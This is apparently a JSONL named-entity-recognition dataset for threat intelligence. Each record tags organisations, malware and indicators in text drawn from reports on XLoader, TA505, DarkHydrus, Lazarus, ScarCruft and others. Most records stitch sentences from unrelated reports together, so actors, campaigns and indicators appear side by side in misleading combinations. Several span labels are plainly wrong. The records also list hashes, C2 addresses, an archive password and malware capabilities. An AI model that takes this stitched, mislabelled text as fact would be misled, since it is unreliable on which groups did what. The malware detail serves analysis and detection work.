{"text": "This brought to us the hypothesis that this might be a version used by the group behind ViceLeaker for internal communication or for other , unclear purposes . We confirmed that this is a DarkHydrus Group's new attack targeting Middle East region . The ScarCruft has shown itself to be a highly-skilled and active group .", "spans": [{"start": 88, "end": 98, "label": "Malware"}, {"start": 188, "end": 198, "label": "Organization"}, {"start": 253, "end": 262, "label": "Organization"}]}
{"text": "All the detections of this backdoored app were geolocated in Iran . In July 2018 , Palo Alto disclosed DarkHydrus Group which showed its special interest to governments in Middle East . It has a keen interest in North Korean affairs , attacking those in the business sector who may have any connection to North Korea , as well as diplomatic agencies around the globe .", "spans": [{"start": 83, "end": 92, "label": "Organization"}, {"start": 103, "end": 113, "label": "Organization"}, {"start": 157, "end": 168, "label": "Organization"}]}
{"text": "Backdoored Conversations C2 server analysis During the analysis of the Smali injected apps and their C2 server infrastructure we hadn \u2019 t found any interesting clues , but things changed when we looked at the C2 server of the linked Conversations messenger . Prior to that report , we published detail analysis on malware exploiting CVE-2018-8414 vulnerability (remote code execution in SettingContent-ms) , which is believed a work of DarkHydrus . ScarCruft tools : 02681a7fe708f39beb7b3cf1bd557ee9 Bluetooth info harvester .", "spans": [{"start": 333, "end": 346, "label": "Vulnerability"}, {"start": 436, "end": 446, "label": "Organization"}, {"start": 449, "end": 458, "label": "Organization"}, {"start": 467, "end": 499, "label": "Indicator"}, {"start": 500, "end": 509, "label": "System"}]}
{"text": "It uses \u201c 185.51.201 [ . However , the final payload is something that welivesecurity have never seen associated with Buhtrap . ScarCruft tools : C781f5fad9b47232b3606e4d374900cd Installer .", "spans": [{"start": 10, "end": 24, "label": "Indicator"}, {"start": 71, "end": 85, "label": "Organization"}, {"start": 118, "end": 125, "label": "Organization"}, {"start": 128, "end": 137, "label": "Organization"}, {"start": 146, "end": 178, "label": "Indicator"}, {"start": 179, "end": 188, "label": "System"}]}
{"text": "] 133 \u201d as a main C2 address , and there is only one domain that is hosted on this dedicated server \u2013 iliageram [ . It's coincident that both 'darkhydrus' APT group name and \u2018Williams\u2019 user name in PDB path found in this Twitter user . ScarCruft tools : 032ed0cd234f73865d55103bf4ceaa22 Downloader .", "spans": [{"start": 102, "end": 115, "label": "Indicator"}, {"start": 142, "end": 154, "label": "Organization"}, {"start": 174, "end": 184, "label": "Organization"}, {"start": 221, "end": 233, "label": "Organization"}, {"start": 236, "end": 245, "label": "Organization"}, {"start": 254, "end": 286, "label": "Indicator"}, {"start": 287, "end": 297, "label": "System"}]}
{"text": "] ir . In recent APT incidents , Dark Hydruns tend to adopt Office VBA macro instead of Office 0day vulnerability in the consideration of cost reduction . ScarCruft tools : 22aaf617a86e026424edb7c868742495 AV Remover .", "spans": [{"start": 33, "end": 45, "label": "Organization"}, {"start": 60, "end": 76, "label": "System"}, {"start": 155, "end": 164, "label": "Organization"}, {"start": 173, "end": 205, "label": "Indicator"}, {"start": 206, "end": 216, "label": "System"}]}
{"text": "Note that we later found versions that used the domain as a C2 directly instead of the IP address . ASERT uncovered a credential theft campaign we call LUCKY ELEPHANT where attackers masquerade as legitimate entities such as foreign government , telecommunications , and military . ScarCruft tools : 07d2200f5c2d03845adb5b20841faa94 AV Remover .", "spans": [{"start": 100, "end": 105, "label": "Organization"}, {"start": 152, "end": 166, "label": "Organization"}, {"start": 225, "end": 243, "label": "Organization"}, {"start": 246, "end": 264, "label": "Organization"}, {"start": 271, "end": 279, "label": "Organization"}, {"start": 282, "end": 291, "label": "Organization"}, {"start": 300, "end": 332, "label": "Indicator"}, {"start": 333, "end": 343, "label": "System"}]}
{"text": "The record contains a personal email address : WHOIS records of C2 server exposing the attacker \u2019 s email address We were aware of the possibility that the attackers might be using a compromised email account , so we dug deeper to find more information related to this email address . From at least February 2019 to present , the actors in the LUCKY ELEPHANT campaign copied webpages to mimic South Asian government websites as well as Microsoft Outlook 365 login pages and hosted them on their own doppelganger domains , presumably to trick victims into providing login credentials . GreezaBackdoor of DarkHotel : 5e0e11bca0e94914e565c1dcc1ee6860 .", "spans": [{"start": 344, "end": 358, "label": "Organization"}, {"start": 393, "end": 424, "label": "Organization"}, {"start": 436, "end": 453, "label": "Organization"}, {"start": 585, "end": 599, "label": "Malware"}, {"start": 603, "end": 612, "label": "Organization"}, {"start": 615, "end": 647, "label": "Indicator"}]}
{"text": "A quick search produced results about a personal page and , what is more interesting , a GitHub account that contains a forked Conversation repository . ASERT suspects that the Actors use phishing emails to lure victims to the doppelganger websites and entice users to enter their credentials . TA505 is Expanding its Operations In the last few days , during monitoring activities , Yoroi CERT noticed a suspicious attack against an Italian organization .", "spans": [{"start": 89, "end": 95, "label": "Organization"}, {"start": 153, "end": 158, "label": "Organization"}, {"start": 295, "end": 300, "label": "Organization"}, {"start": 383, "end": 393, "label": "Organization"}]}
{"text": "Related Github account contains forked Conversations repository Summarizing all the found clues , we have the following attribution flow : Conclusion The operation of ViceLeaker is still ongoing , as is our research . It is important to note that one domain , yahoomail[.]cf is only associated with this group from February 2019 onward . The malicious email contains a highly suspicious sample which triggered the ZLAB team to investigate its capabilities and its possible attribution , discovering a potential expansion of the TA505 operation .", "spans": [{"start": 8, "end": 14, "label": "Organization"}, {"start": 167, "end": 177, "label": "Malware"}, {"start": 304, "end": 309, "label": "Organization"}, {"start": 352, "end": 357, "label": "System"}, {"start": 414, "end": 418, "label": "Organization"}, {"start": 528, "end": 533, "label": "Organization"}]}
{"text": "The attackers have taken down their communication channels and are probably looking for ways to assemble their tools in a different manner . In late 2018 , the domain was associated with a different APT group / campaign of Chinese origin . The threat group is also known for its recent attack campaign against Bank and Retail business sectors , but the latest evidence indicates a potential expansion of its criminal operation to other industries too .", "spans": [{"start": 199, "end": 208, "label": "Organization"}]}
{"text": "Kaspersky detects and blocks samples of the ViceLeaker operation using the following verdict : Trojan-Spy.AndroidOS.ViceLeaker . Based on our analysis into the activity , ASERT deems with moderate confidence that an Indian APT group is behind the LUCKY ELEPHANT campaign . Dropper : 0c88e285b6fc183c96b6f03ca5700cc9ca7c83dfccc6ad14a946d1868d1cc273 Excel file with malicious macro .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 44, "end": 54, "label": "Malware"}, {"start": 95, "end": 128, "label": "Indicator"}, {"start": 216, "end": 232, "label": "Organization"}, {"start": 273, "end": 280, "label": "Malware"}, {"start": 283, "end": 347, "label": "Indicator"}, {"start": 348, "end": 353, "label": "System"}, {"start": 364, "end": 379, "label": "System"}]}
{"text": "* Actually , we are currently investigating whether this group might also be behind a large-scale web-oriented attack at the end of 2018 using code injection and exploiting SQL vulnerabilities . The targets are typical of known Indian APT activity and the infrastructure was previously used by an Indian APT group . The intercepted attack starts with a spear phishing email embedding a spreadsheet .", "spans": [{"start": 173, "end": 192, "label": "Vulnerability"}, {"start": 304, "end": 313, "label": "Organization"}]}
{"text": "Even when this would not be directly related to the Android malware described in this blogpost , it would be an indicator of wider capabilities and objectives of this actor . DoNot Team has a history of heavily targeting Pakistan , in addition to other neighboring countries . The document is weaponized with malicious macro code triggered when the user opens the document to see the content under the obfuscated view .", "spans": [{"start": 52, "end": 59, "label": "System"}, {"start": 175, "end": 185, "label": "Organization"}, {"start": 309, "end": 324, "label": "System"}]}
{"text": "XLoader Android Spyware and Banking Trojan Distributed via DNS Spoofing We have been detecting a new wave of network attacks since early March , which , for now , are targeting Japan , Korea , China , Taiwan , and Hong Kong . The 360 Intelligence Center observed four distinct campaigns against Pakistan since 2017 (link) , recently targeting Pakistani businessmen working in China . To understand its capabilities , the macro code has been isolated and analyzed in detail .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 8, "end": 15, "label": "System"}, {"start": 343, "end": 364, "label": "Organization"}, {"start": 421, "end": 426, "label": "System"}]}
{"text": "Trend Micro detects these as ANDROIDOS_XLOADER.HRX . DoNot Team\u2019s confirmed use of this IP dates back to September 2018 , with a six-month gap until it was used to host doppelganger domains for the LUCKY ELEPHANT campaign in early February . Surprisingly , the source code is composed by more than 1600 lines of code and it is highly obfuscated .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 29, "end": 50, "label": "Indicator"}, {"start": 53, "end": 58, "label": "Organization"}]}
{"text": "By : Trend Micro April 20 , 2018 We have been detecting a new wave of network attacks since early March , which , for now , are targeting Japan , Korea , China , Taiwan , and Hong Kong . One of the IP addresses , 128.127.105.13 , was previously used by the DoNot Team (aka APT-C-35) , a suspected Indian APT group . Paying more attention during the code analysis , we discovered that it is full of junk instructions used to declare and initialize variables never used .", "spans": [{"start": 5, "end": 16, "label": "Organization"}, {"start": 257, "end": 267, "label": "Organization"}]}
{"text": "The attacks use Domain Name System ( DNS ) cache poisoning/DNS spoofing , possibly through infringement techniques such as brute-force or dictionary attacks , to distribute and install malicious Android apps . The actors behind LUCKY ELEPHANT recognize the effectiveness and use doppelganger webpages nearly identical to legitimate sites , enticing users to input their credentials . Only a small portion of this code is actually used to start the infection , the rest is just junk code .", "spans": [{"start": 195, "end": 202, "label": "System"}, {"start": 228, "end": 242, "label": "Organization"}, {"start": 279, "end": 300, "label": "System"}]}
{"text": "Trend Micro detects these as ANDROIDOS_XLOADER.HRX . The heavier targeting in Pakistan adheres to historical targeting and the ongoing tension between the two countries , which has escalated since a terrorist attack in Kashmir on 14 February 2019 . Once the macro is executed , the malware downloads two files from \u201c kentona[.su \u201d , using an SSL encrypted communication , and stores them in \u201c C:\\Users\\Public \u201d path : \u201c rtegre.exe \u201d and \u201c wprgxyeqd79.exe \u201d .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 29, "end": 50, "label": "Indicator"}, {"start": 258, "end": 263, "label": "System"}, {"start": 317, "end": 328, "label": "Indicator"}, {"start": 342, "end": 345, "label": "Indicator"}, {"start": 420, "end": 430, "label": "Indicator"}, {"start": 439, "end": 454, "label": "Indicator"}]}
{"text": "These malware pose as legitimate Facebook or Chrome applications . The targeting of Pakistan , Bangladesh , Sri Lanka , Maldives , Myanmar , Nepal , and the Shanghai Cooperation Organization are all historical espionage targets by India . Generic : aafa83d5e0619e69e64fcac4626cfb298baac54c7251f479721df1c2eb16bee7 Trojan S-MAL/Downloader ( Executable file ) .", "spans": [{"start": 33, "end": 41, "label": "System"}, {"start": 45, "end": 51, "label": "System"}, {"start": 157, "end": 190, "label": "Organization"}, {"start": 210, "end": 219, "label": "Organization"}, {"start": 239, "end": 246, "label": "Malware"}, {"start": 249, "end": 313, "label": "Indicator"}, {"start": 314, "end": 337, "label": "System"}]}
{"text": "They are distributed from polluted DNS domains that send a notification to an unknowing victim \u2019 s device . However , it is clear is that Donot are actively establishing infrastructure and are targeting governments in South Asia . Trojan : 6f1a8ee627ec2ed7e1d818d32a34a163416938eb13a97783a71f9b79843a80a2 SFX ( self-extracting archive ) ( Executable file ) .", "spans": [{"start": 138, "end": 143, "label": "Organization"}, {"start": 231, "end": 237, "label": "Malware"}, {"start": 240, "end": 304, "label": "Indicator"}, {"start": 305, "end": 308, "label": "System"}, {"start": 311, "end": 334, "label": "System"}]}
{"text": "The malicious apps can steal personally identifiable and financial data and install additional apps . First attack of this campaign took place in May 2018 . The \u201c wprgxyeqd79.exe \u201d sample actually is a Self Extracting Archive ( SFX S-TOOL/SFA ) containing four files designed to be extracted in the %TEMP% folder .", "spans": [{"start": 163, "end": 178, "label": "Indicator"}, {"start": 202, "end": 225, "label": "System"}, {"start": 228, "end": 242, "label": "System"}]}
{"text": "XLoader can also hijack the infected device ( i.e. , send SMSs ) and sports self-protection/persistence mechanisms through device administrator privileges . Arbor also published APT research on this group , and named it \u2018Donot\u2019 . After that , it executes \u201c exit.exe \u201d which launches the \u201c i.cmd \u201d batch script .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 157, "end": 162, "label": "Organization"}, {"start": 220, "end": 227, "label": "Organization"}, {"start": 257, "end": 265, "label": "Indicator"}, {"start": 289, "end": 294, "label": "Indicator"}]}
{"text": "Infection Chain As with our earlier reports in late March , the attack chain involves diverting internet traffic to attacker-specified domains by compromising and overwriting the router \u2019 s DNS settings . Donot attacked government agencies , aiming for classified intelligence . This new script performs a ping to \u201c www[.cloudflare[.com \u201d for three times with a delay of 3000ms , testing the connectivity of the victim machine .", "spans": [{"start": 205, "end": 210, "label": "Organization"}, {"start": 220, "end": 239, "label": "Organization"}, {"start": 316, "end": 336, "label": "Indicator"}]}
{"text": "A fake alert will notify and urge the user to access the malicious domain and download XLoader . We identified this APT group coded as \u2018APT-C-35\u2019 in 2017 , who is mainly targeting Pakistan and other South Asian countries for cyber espionage . If the host is successfully reached , the script renames a file named \u201c kernel.dll \u201d , obviously not the real one , in \u201c uninstall.exe \u201d , another misleading name .", "spans": [{"start": 87, "end": 94, "label": "Malware"}, {"start": 135, "end": 145, "label": "Organization"}, {"start": 315, "end": 325, "label": "Indicator"}, {"start": 364, "end": 377, "label": "Indicator"}]}
{"text": "Technical Analysis XLoader first loads the encrypted payload from Assets/db as test.dex to drop the necessary modules then requests for device administrator privileges . At least 4 attack campaigns against Pakistan have been observed by us since 2017 . Then it invokes the renamed executable and runs it passing a series of parameter : \u201c uninstall.exe x -pQELRatcwbU2EJ5 -y \u201d", "spans": [{"start": 19, "end": 26, "label": "Malware"}, {"start": 66, "end": 75, "label": "Indicator"}, {"start": 79, "end": 87, "label": "Indicator"}, {"start": 338, "end": 351, "label": "Indicator"}]}
{"text": "Once granted permission , it hides its icon from the launcher application list then starts a service that it keeps running in the background . Spear phishing emails with vulnerable Office documents or malicious macros are sent to victims . These parameters are needed to self-decrypt the \u201c uninstall.exe \u201d file which is again another SFX archive .", "spans": [{"start": 143, "end": 157, "label": "System"}, {"start": 290, "end": 303, "label": "Indicator"}, {"start": 334, "end": 337, "label": "System"}]}
{"text": "The background service uses the reflection technique ( a feature that allows the inspection and modification of Java-based programs \u2019 internal properties ) to invoke the method com.Loader.start in the payload . In the latest attack , Donot group is targeting Pakistani businessman working in China . The \u201c -p \u201d parameter , indeed , specify the password of the archive to be extracted .", "spans": [{"start": 177, "end": 193, "label": "Indicator"}, {"start": 234, "end": 245, "label": "Organization"}, {"start": 259, "end": 280, "label": "Organization"}]}
{"text": "Monitoring Broadcast Events XLoader registers many broadcast receivers in the payload dynamically ( to monitor broadcast events sent between system and applications ) . Two unique malware frameworks , EHDevel and yty , are developed by attackers . The crucial file , at this point of the infection , is the SFX executable named \u201c uninstall.exe \u201d .", "spans": [{"start": 28, "end": 35, "label": "Malware"}, {"start": 201, "end": 208, "label": "System"}, {"start": 213, "end": 216, "label": "System"}, {"start": 236, "end": 245, "label": "Organization"}, {"start": 307, "end": 310, "label": "System"}, {"start": 330, "end": 343, "label": "Indicator"}]}
{"text": "Registering broadcast receivers enable XLoader to trigger its malicious routines . wuaupdt.exe is a CMD backdoor , which can receive and execute CMD commands sent from C2 . It has a structure similar to previous \u201c wprgxyeqd79.exe \u201d file : two of their files have the same name , but the content of this new SFX is extracted in the \u201c %ALLUSERSPROFILE%\\Windows Anytime Upgrade \u201d directory .", "spans": [{"start": 39, "end": 46, "label": "Malware"}, {"start": 83, "end": 94, "label": "Malware"}, {"start": 100, "end": 103, "label": "System"}, {"start": 125, "end": 132, "label": "Malware"}, {"start": 137, "end": 157, "label": "Malware"}, {"start": 214, "end": 229, "label": "Indicator"}, {"start": 307, "end": 310, "label": "System"}, {"start": 333, "end": 358, "label": "System"}]}
{"text": "Here is a list of broadcast actions : android.provider.Telephony.SMS_RECEIVED android.net.conn.CONNECTIVITY_CHANGE android.intent.action.BATTERY_CHANGED android.intent.action.USER_PRESENT android.intent.action.PHONE_STATE android.net.wifi.SCAN_RESULTS android.intent.action.PACKAGE_ADDED android.intent.action.PACKAGE_REMOVED android.intent.action.SCREEN_OFF android.intent.action.SCREEN_ON Furthermore , it has similar code logic as previous ones wuaupdt.exe in this attack appears in previous Donot attack , and C2 addresses are same to previous ones . Another time , the execution flow moves from \u201c exit.exe to \u201c i.cmd \u201d .", "spans": [{"start": 38, "end": 77, "label": "Indicator"}, {"start": 78, "end": 114, "label": "Indicator"}, {"start": 115, "end": 152, "label": "Indicator"}, {"start": 153, "end": 187, "label": "Indicator"}, {"start": 188, "end": 221, "label": "Indicator"}, {"start": 222, "end": 251, "label": "Indicator"}, {"start": 252, "end": 287, "label": "Indicator"}, {"start": 288, "end": 325, "label": "Indicator"}, {"start": 326, "end": 358, "label": "Indicator"}, {"start": 359, "end": 390, "label": "Indicator"}, {"start": 448, "end": 459, "label": "Malware"}, {"start": 602, "end": 610, "label": "Indicator"}, {"start": 616, "end": 621, "label": "Indicator"}]}
{"text": "android.media.RINGER_MODE_CHANGED android.sms.msg.action.SMS_SEND android.sms.msg.action.SMS_DELIVERED Creating a Web Server to Phish XLoader creates a provisional web server to receive the broadcast events . From the attack activity captured this time , it is obvious that Donot APT group is still keen on Pakistan as primary target of attack , and even expands scope of attack to include Pakistani staffs and institutions in China . The script is quite different from the previous one : it guarantees its persistence on the victim machine through the setting of \u201c HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \u201d registry key , creating a new entry named \u201c Windows Anytime Upgrade \u201d which points to \u201c winserv.exe \u201d , just stored into the same folder .", "spans": [{"start": 0, "end": 33, "label": "Indicator"}, {"start": 34, "end": 65, "label": "Indicator"}, {"start": 66, "end": 102, "label": "Indicator"}, {"start": 134, "end": 141, "label": "Malware"}, {"start": 274, "end": 289, "label": "Organization"}, {"start": 663, "end": 670, "label": "System"}, {"start": 707, "end": 718, "label": "Indicator"}]}
{"text": "It can also create a simple HTTP server on the infected device to deceive victims . Buhtrap still make extensive use of NSIS installers as droppers and these are mainly delivered through malicious documents . Thus , the script provides to run \u201c winserv.exe \u201d .", "spans": [{"start": 84, "end": 91, "label": "Organization"}, {"start": 120, "end": 135, "label": "Organization"}, {"start": 245, "end": 256, "label": "Indicator"}]}
{"text": "It shows a web phishing page whenever the affected device receives a broadcast event ( i.e. , if a new package is installed or if the device \u2019 s screen is on ) to steal personal data , such as those keyed in for banking apps . They first came to light in 2016 , when they managed to steal sensitive information from the US Democratic National Committee (DNC) . An interesting part of the script is the continuous killing of every \u201c rundll32.exe \u201d process running into the victim machine , generates a huge amount of noise , as visible in the following process explorer view .", "spans": [{"start": 353, "end": 358, "label": "Organization"}, {"start": 432, "end": 444, "label": "Indicator"}]}
{"text": "The phishing page is translated in Korean , Japanese , Chinese , and English , which are hardcoded in the payload . Earworm first came to light in 2016 , when they managed to steal sensitive information from the US Democratic National Committee (DNC) . Anyway , just before the kill loop , the real malicious payload is executed : the", "spans": [{"start": 116, "end": 123, "label": "Organization"}, {"start": 245, "end": 250, "label": "Organization"}]}
{"text": "It will appear differently to users depending on the language set on the device . They were also behind an attack on the World Anti-Doping Agency (WADA) , in which they leaked confidential information about several drug tests . \u201c winserv.exe \u201d file .", "spans": [{"start": 82, "end": 86, "label": "Organization"}, {"start": 146, "end": 152, "label": "Organization"}, {"start": 230, "end": 241, "label": "Indicator"}]}
{"text": "XLoader as Spyware and Banking Trojan XLoader can also collect information related to usage of apps installed in the device . SPLM , GAMEFISH , and Zebrocy delivery all maintain their own clusters , but frequently overlap later . Analyzing it in depth , we discover it actually is the RMS ( Remote Manipulator System ) client by TektonIT , encrypted using the MPress PE compressor utility , a legitimate tool , to avoid antivirus detection .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 38, "end": 45, "label": "Indicator"}, {"start": 126, "end": 130, "label": "Organization"}, {"start": 133, "end": 141, "label": "Organization"}, {"start": 148, "end": 155, "label": "Organization"}, {"start": 285, "end": 288, "label": "System"}, {"start": 291, "end": 316, "label": "System"}, {"start": 329, "end": 337, "label": "System"}, {"start": 360, "end": 369, "label": "System"}]}
{"text": "Its data-stealing capabilities include collecting SMSs after receiving an SMS-related broadcast event and covertly recording phone calls . Our previous post on Sofacy's 2017 activity stepped away from the previously covered headline buzz presenting their association with previously known political hacks and interest in Europe and the US , and examines their under-reported ongoing activity in middle east , central asia , and now a shift in targeting further east , including China , along with an overlap surprise . TektonIT RMS acts as a remote administration tool , allowing the attacker to gain complete access to the victim machine .", "spans": [{"start": 160, "end": 168, "label": "Organization"}, {"start": 519, "end": 527, "label": "System"}, {"start": 528, "end": 531, "label": "System"}]}
{"text": "XLoader can also hijack accounts linked to financial or game-related apps installed on the affected device . The larger , 300kb+ SPLM backdoors deployed in 2016 and 2017 are not observed any longer at targets in 2018 . Together with the RMS executable , there is another file named \u201c settings.dat \u201d containing the custom configuration prepared by the attacker .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 129, "end": 133, "label": "Organization"}, {"start": 237, "end": 240, "label": "System"}, {"start": 284, "end": 296, "label": "Indicator"}]}
{"text": "XLoader can also start other attacker-specified packages . A previous , removed , report from another vendor claimed non-specific information about the groups' interest in Chinese universities , but that report has been removed \u2013 most likely detections were related to students\u2019 and researchers\u2019 scanning known collected samples and any incidents\u201d remain unconfirmed and unknown . It contains information like : Server address and port the client will connect to ; The password chosen by the attacker for the remote access ; The ID associated to the victim client .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 152, "end": 159, "label": "Organization"}, {"start": 172, "end": 192, "label": "Organization"}]}
{"text": "A possible attack scenario involves replacing legitimate apps with repackaged or malicious versions . Either way , the group's consistent activity throughout central and eastern asia seems to be poorly represented in the public discussion . All these information are automatically loaded by the RMS executable and firstly stored in the registry key \u201c HKCU\\Software\\tektonik\\Remote MANIPULATOR System\\Host\\parameters \u201d .", "spans": [{"start": 119, "end": 126, "label": "Organization"}, {"start": 295, "end": 298, "label": "System"}]}
{"text": "By monitoring the package installation broadcast event , XLoader can start their packages . The actors behind this campaign we call LUCKY ELEPHANT use doppelganger webpages to mimic legitimate entities such as foreign governments , telecommunications , and military . At the next startup , the software will directly load the configuration from the just created key .", "spans": [{"start": 57, "end": 64, "label": "Malware"}, {"start": 132, "end": 146, "label": "Organization"}, {"start": 151, "end": 172, "label": "System"}, {"start": 210, "end": 229, "label": "Organization"}, {"start": 232, "end": 250, "label": "Organization"}, {"start": 257, "end": 265, "label": "Organization"}]}
{"text": "This enables it to launch malicious apps without the user \u2019 s awareness and explicit consent . Currently , Sofacy targets large air-defense related commercial organizations in China with SPLM , and moves Zebrocy focus across Armenia , Turkey , Kazahkstan , Tajikistan , Afghanistan , Mongolia , China , and Japan . The client establishes a new connection with the remote command and control server hosted on a Bulgarian remote host 217.12.201.159 , part of a Virtual Dedicated Server subnet of the AS-21100, operated by ITL LLC .", "spans": [{"start": 432, "end": 446, "label": "Indicator"}, {"start": 459, "end": 483, "label": "System"}, {"start": 520, "end": 523, "label": "System"}, {"start": 524, "end": 527, "label": "System"}]}
{"text": "We reverse engineered XLoader and found that it appears to target South Korea-based banks and game development companies . Either way , Sofacy's consistent activity throughout central and eastern asia seems to be poorly represented in the public discussion . After the reconstruction of the full infection chain , we noticed strong similarities with a recent spear-phishing attack campaign against an unspecified US retail company .", "spans": [{"start": 22, "end": 29, "label": "Malware"}, {"start": 136, "end": 144, "label": "Organization"}]}
{"text": "XLoader also prevents victims from accessing the device \u2019 s settings or using a known antivirus ( AV ) app in the country . According to this new alert , Hidden Cobra the U.S government\u2019s code name for Lazarus has been conducting FASTCash attacks stealing money from Automated Teller Machines (ATMs) from banks in Asia and Africa since at least 2016 . The attack , as stated by CyberInt , leveraged a command and control server located in Germany related to the TA505 actor : a very active group involved in cyber-criminal operation all around the world , threatening a wide range of high profile companies , active since 2014 .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 154, "end": 166, "label": "Organization"}, {"start": 305, "end": 310, "label": "Organization"}, {"start": 378, "end": 386, "label": "Organization"}, {"start": 462, "end": 467, "label": "Organization"}]}
{"text": "XLoader can also load multiple malicious modules to receive and execute commands from its remote command-and-control ( C & C ) server , as shown below : Here \u2019 s a list of the modules and their functions : sendSms \u2014 send SMS/MMS to a specified address setWifi \u2014 enable or disable Wi-Fi connection gcont \u2014 collect all the device \u2019 s contacts lock \u2014 currently just an input lock status in the settings ( pref ) file , but may be used as a screenlocking ransomware bc \u2014 collect all contacts Lazarus is a very active attack group involved in both cyber crime and espionage . The comparison of the infection chains reveals in both cases the attacker used a couple of SFX stages to deploy the \u201c RMS \u201d software : a legitimate remote administration tool produced by the Russian company \u201c TektonIT \u201d .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 488, "end": 495, "label": "Organization"}, {"start": 662, "end": 665, "label": "System"}, {"start": 689, "end": 692, "label": "System"}, {"start": 780, "end": 788, "label": "System"}]}
{"text": "from the Android device and SIM card setForward \u2014 currently not implemented , but can be used to hijack the infected device getForward \u2014 currently not implemented , but can be used to hijack the infected device hasPkg \u2014 check the device whether a specified app is installed or not setRingerMode \u2014 set the device \u2019 s ringer mode setRecEnable \u2014 set the device \u2019 s ringer mode as silent reqState \u2014 get a detailed phone connection status , which includes activated network and Wi-Fi ( with or without password ) showHome \u2014 The group was initially known for its espionage operations and a number of high-profile disruptive attacks , including the 2014 attack on Sony Pictures . The tool is able to grant remote access and full , direct control of the infected machine to the group .", "spans": [{"start": 9, "end": 16, "label": "System"}, {"start": 523, "end": 528, "label": "Organization"}]}
{"text": "force the device \u2019 s back to the home screen getnpki : get files/content from the folder named NPKI ( contains certificates related to financial transactions ) http \u2014 access a specified network using HttpURLConnection onRecordAction \u2014 simulate a number-dialed tone call \u2014 call a specified number get_apps \u2014 get all the apps installed on the device show_fs_float_window \u2014 show a full-screen window for phishing Of note is XLoader \u2019 s abuse of the WebSocket protocol ( supported in many browsers Following US-CERTs report , Symantec's research uncovered the key component used in Lazarus's recent wave of financial attacks . Also , some code pieces are directly re-used in the", "spans": [{"start": 421, "end": 428, "label": "Malware"}, {"start": 578, "end": 587, "label": "Organization"}, {"start": 603, "end": 612, "label": "Organization"}]}
{"text": "and web applications ) via ws ( WebSockets ) or wss ( WebSockets over SSL/TLS ) to communicate with its C & C servers . More recently , Lazarus has also become involved in financially motivated attacks , including an US$81 million dollar theft from the Bangladesh Central Bank and the WannaCry ransomware . analyzed campaigns , such as the \u201c i.cmd \u201d and \u201c exit.exe \u201d files , and , at the same time , some new components have been introduced , for instance the \u201c rtegre.exe \u201d and the \u201c veter1605_MAPS_10cr0.exe \u201d file .", "spans": [{"start": 136, "end": 143, "label": "Organization"}, {"start": 253, "end": 276, "label": "Organization"}, {"start": 285, "end": 293, "label": "System"}, {"start": 342, "end": 347, "label": "Indicator"}, {"start": 356, "end": 364, "label": "Indicator"}, {"start": 462, "end": 472, "label": "Indicator"}, {"start": 485, "end": 509, "label": "Indicator"}]}
{"text": "The URLs \u2014 abused as part of XLoader \u2019 s C & C \u2014 are hidden in three webpages , and the C & C server that XLoader connects to differ per region . Other open source and semi-legitimate pen-testing tools like nbtscan and powercat are being used for mapping available resources and lateral movement as well . During the analysis , we also noticed the \u201c veter1605_MAPS_10cr0.exe \u201d file slightly changed run after run , a few hours after the initial discovery the infection chain dropped it with different icons , different suffix , from \u201c cr0 \u201d to \u201c cr24 \u201d , and appendix from \u201c veter1605_ \u201d to \u201c veter2005_ \u201d .", "spans": [{"start": 29, "end": 36, "label": "Malware"}, {"start": 106, "end": 113, "label": "Malware"}, {"start": 207, "end": 214, "label": "Malware"}, {"start": 219, "end": 227, "label": "Malware"}, {"start": 350, "end": 374, "label": "Indicator"}]}
{"text": "The abuse of the WebSocket protocol provides XLoader with a persistent connection between clients and servers where data can be transported any time . To make the fraudulent withdrawals , Lazarus first breaches targeted banks' networks and compromises the switch application servers handling ATM transactions . This may indicate the campaign is still ongoing .", "spans": [{"start": 45, "end": 52, "label": "Malware"}, {"start": 188, "end": 195, "label": "Organization"}, {"start": 220, "end": 226, "label": "Organization"}]}
{"text": "XLoader abuses the MessagePack ( a data interchange format ) to package the stolen data and exfiltrate it via the WebSocket protocol for faster and more efficient transmission . The operation , known as FASTCash\u201d has enabled Lazarus to fraudulently empty ATMs of cash . The TA505 group is one of the most active threat groups operating since 2014 , it has traditionally targeted Banking and Retail industries , as we recently documented during the analysis of the \u201c Stealthy Email Stealer \u201d part of their arsenal .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 225, "end": 232, "label": "Organization"}, {"start": 274, "end": 279, "label": "Organization"}]}
{"text": "Mitigations XLoader will not download malicious apps if the Android device uses a mobile data connection . In order to permit their fraudulent withdrawals from ATMs , Lazarus inject a malicious Advanced Interactive eXecutive (AIX) executable into a running , legitimate process on the switch application server of a financial transaction network , in this case a network handling ATM transactions . The peculiarity of this recent attack wave is it actually hit a company not strictly in the Banking or Retail sector , as they recently did , suggesting the threat group could be potentially widening their current operations .", "spans": [{"start": 12, "end": 19, "label": "Malware"}, {"start": 167, "end": 174, "label": "Organization"}, {"start": 225, "end": 230, "label": "System"}]}
